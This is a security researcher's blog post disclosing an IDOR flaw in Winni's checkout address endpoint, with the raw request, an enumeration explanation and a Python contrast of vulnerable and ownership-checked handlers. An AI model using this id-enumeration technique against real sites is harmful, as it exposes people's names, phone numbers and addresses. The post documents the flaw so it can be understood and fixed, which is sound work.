# Buying A Gift Can Cost You Your PII Data

Almost a year ago I reported a **PII data leak** to the [Winni Bug Bounty Program](https://www.winni.in/bug-bounty).

[![](https://cdn.hashnode.com/res/hashnode/image/upload/v1656363287589/UYkRp1uxa.png)](https://1.bp.blogspot.com/-OdfveK88MKE/Xta3mTfY9WI/AAAAAAAAVus/KSGY9iRZxdoK4ONy58gg2WJ5qbM3MEN1ACLcBGAsYHQ/s1600/Screenshot_195.png)

After 20+ follow-up mails I am disclosing the issue, though the [Winni](https://www.winni.in/) team fixed it silently without responding back.

[![](https://cdn.hashnode.com/res/hashnode/image/upload/v1656363289777/2RS5LbXpZ.jpeg)](https://aniportalimages.s3.amazonaws.com/media/details/Winni_Logo_Square_rwUpPrm.jpg)

So the issue is a pretty straightforward [IDOR](https://portswigger.net/web-security/access-control/idor).

Winni delivers cakes and gifts to your loved ones; while placing an order, before payment, it asks for the delivery address.

When you select one of your saved addresses, a POST request is made to fetch that address by its `addressId`:


```http
POST /checkout/adv/address/select-previous HTTP/1.1
Host: winni.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Origin: winni.in
Connection: close
Referer: winni.in/checkout/adv/address
Cookie: AWSALBTG=XXX

addressId=685945
```


Altering the `addressId` value returns another user's address along with their name and phone number: the server never checks that the requested address belongs to the logged-in user.

Because `addressId` values are sequential, an attacker can enumerate every address stored in the database, resulting in a mass PII leak of names, phone numbers and addresses.
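The root cause is a lookup keyed only by the client-supplied id. The following is an added illustration, not Winni's code: a minimal in-memory model of the `select-previous` handler in its vulnerable form beside the hardened form that scopes the lookup to the session user (the address records, user ids and the `Address`/`NotFound` names are constructed for the example).

```python
from dataclasses import dataclass

# Constructed sample data: a tiny address table keyed by a sequential
# addressId, mirroring the request shown above (all values made up).
@dataclass
class Address:
    address_id: int
    owner_user_id: int
    name: str
    phone: str
    line1: str

ADDRESSES = {
    685945: Address(685945, 101, "Alice", "+91-90000-00001", "12 Park St"),
    685946: Address(685946, 202, "Bob", "+91-90000-00002", "7 Lake Rd"),
}

class NotFound(Exception):
    """Raised for a missing *or* foreign address, so the response is identical
    in both cases and does not confirm whether an id exists."""

def select_previous_vulnerable(session_user_id: int, address_id: int) -> Address:
    """Mirrors the reported behaviour: the lookup trusts addressId from the
    request body and never consults the session, so any id resolves."""
    try:
        return ADDRESSES[address_id]
    except KeyError:
        raise NotFound() from None

def select_previous_fixed(session_user_id: int, address_id: int) -> Address:
    """Hardened handler: the row must belong to the authenticated user.
    In SQL this is the difference between `WHERE id = ?` and
    `WHERE id = ? AND user_id = ?`, with user_id taken from the session."""
    addr = ADDRESSES.get(address_id)
    if addr is None or addr.owner_user_id != session_user_id:
        raise NotFound()
    return addr

def can_access(handler, session_user_id: int, address_id: int) -> bool:
    """Helper for checking a handler's decision without reading the record."""
    try:
        handler(session_user_id, address_id)
        return True
    except NotFound:
        return False
```

Replacing the sequential integer with a random identifier (e.g. a UUID) makes enumeration impractical, but it is defence in depth only; the ownership check is the actual fix.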
**POC**

[Proof-of-concept video](https://www.youtube.com/watch?v=Zj26LSPsf1U)
PS: Don't waste your time reporting to their bug bounty program.

Thanks for reading; any suggestions or feedback are welcome.
